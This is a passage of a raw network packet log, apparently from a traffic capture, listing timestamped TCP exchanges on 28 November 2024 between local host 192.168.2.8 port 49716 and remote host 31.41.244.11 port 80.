                                                  Nov 28, 2024 13:12:13.987433910 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.987479925 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.987524033 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.987571955 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.988408089 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.988455057 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.988473892 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.988518000 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.989340067 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.989456892 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.989464045 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.989506006 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.990360022 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.990407944 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.990618944 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.990689993 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.991372108 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.991419077 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.991552114 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.991595030 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.992254019 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.992295980 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:13.992357016 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:13.992403030 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.138870001 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.138973951 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.139060974 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.139108896 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.139328957 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.139372110 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.139542103 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.139588118 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.140284061 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.140321970 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.140386105 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.140428066 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.141298056 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.141345978 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.141427994 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.141467094 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.142318010 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.142369032 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.142385960 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.142426014 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.143260956 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.143301010 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.143326998 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.143358946 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.144350052 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.144387960 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.144711971 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.144750118 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.145704985 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.145739079 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.145750046 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.145785093 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.146246910 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.146292925 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.146651030 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.146699905 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.147099018 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.147150993 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.147196054 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.147238016 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.148061037 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.148119926 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.148161888 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.148204088 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.149036884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.149090052 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.149137020 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.149178028 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.150023937 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.150079012 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.150139093 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.150185108 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.150975943 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.151026011 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.151101112 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.151138067 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.151985884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.152024031 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.152066946 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.152105093 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.152952909 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.152998924 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.153065920 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.153103113 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.153907061 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.153947115 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.154011011 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.154051065 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.154869080 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.154910088 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.154953957 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.154994011 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.155864954 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.155906916 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.155950069 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.155991077 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.156819105 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.156857967 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.156903028 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.156944036 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.157805920 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.157859087 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.157896996 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.157937050 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.158771992 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.158819914 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.158864021 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.158905983 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.159754038 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.159804106 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.159826994 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.159871101 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.160717964 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.160769939 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.160810947 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.160851002 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.161694050 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.161745071 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.161814928 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.161895037 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.162688971 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.162756920 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.162792921 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.162832022 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.163639069 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.163685083 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.163734913 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.163778067 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.164611101 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.164660931 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.164704084 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.164738894 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.165576935 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.165616035 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.165698051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.165739059 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.166551113 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.166591883 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.166603088 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.166640997 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.167594910 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.167644024 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.167687893 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.167725086 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.168555021 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.168597937 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.168641090 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.168684006 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.169483900 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.169529915 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.169575930 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.169617891 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.170439959 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.170480967 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.170528889 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.170567989 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.171406031 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.171458960 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.171503067 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.171544075 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.172422886 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.172468901 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.172513008 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.172557116 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.173377037 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.173427105 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.173552036 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.173594952 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.174329996 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.174382925 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.174424887 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.174465895 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.175288916 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.175339937 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.175429106 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.175472975 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.176261902 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.176312923 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.176348925 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.176390886 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.182240963 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.182282925 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.182291985 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.182323933 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.182600975 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.182643890 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.182830095 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.182868004 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.182960987 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.182998896 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.183768034 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.183801889 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.183892965 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.183932066 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.184753895 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.184798956 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.184864044 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.184915066 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.185808897 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.185857058 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.185884953 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.185924053 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.186764956 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.186816931 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.186858892 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.186908007 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.187886000 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.187931061 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.187937975 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.187982082 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.188700914 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.188751936 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.188802004 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.188843966 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.189650059 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.189702988 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.189779997 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.189821959 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.190650940 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.190704107 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.190716028 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.190756083 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.191565990 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.191617012 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.191900015 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.191945076 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.192539930 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.192588091 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.192769051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.192806959 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.193520069 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.193572044 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.193594933 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.193633080 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.194451094 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.194493055 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.341348886 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.341393948 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.341449976 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.341484070 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.341624022 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.341666937 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.341671944 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.341712952 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.342544079 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.342582941 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.342669010 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.342710972 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.343442917 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.343483925 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.343525887 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.343568087 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.344388008 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.344429970 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.344491959 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.344535112 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.345340967 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.345382929 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.345453024 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.345494986 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.346344948 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.346390963 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.346462011 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.346503019 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.347338915 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.347379923 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.347423077 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.347465992 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.348295927 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.348336935 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.348381042 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.348421097 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.349261045 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.349318981 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.349354029 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.349394083 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.350239038 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.350281954 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.350357056 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.350398064 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.351202965 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.351243973 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.351304054 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.351344109 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.352165937 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.352200985 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.352206945 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.352243900 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.353167057 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.353209019 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.353279114 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.353318930 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.354195118 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.354237080 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.354489088 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.354528904 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.355110884 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.355154991 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.355375051 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.355417967 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.356081963 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.356123924 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.356168985 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.356206894 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.357038021 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.357078075 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.357148886 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.357188940 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.358016014 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.358056068 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.358084917 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.358127117 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.358994961 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.359034061 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.359077930 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.359122038 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.359963894 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.360002995 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.360054016 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.360095024 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.360937119 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.361025095 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.361205101 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.361248016 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.361927986 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.362004042 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.362016916 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.362056971 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.362916946 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.362967968 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.363019943 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.363061905 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.363897085 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.363939047 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.363991022 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.364034891 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.364957094 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.365000010 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.365045071 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.365084887 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.365823984 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.365868092 CET4971680192.168.2.831.41.244.11
                                                  Nov 28, 2024 13:12:14.366044998 CET804971631.41.244.11192.168.2.8
                                                  Nov 28, 2024 13:12:14.366085052 CET4971680192.168.2.831.41.244.11
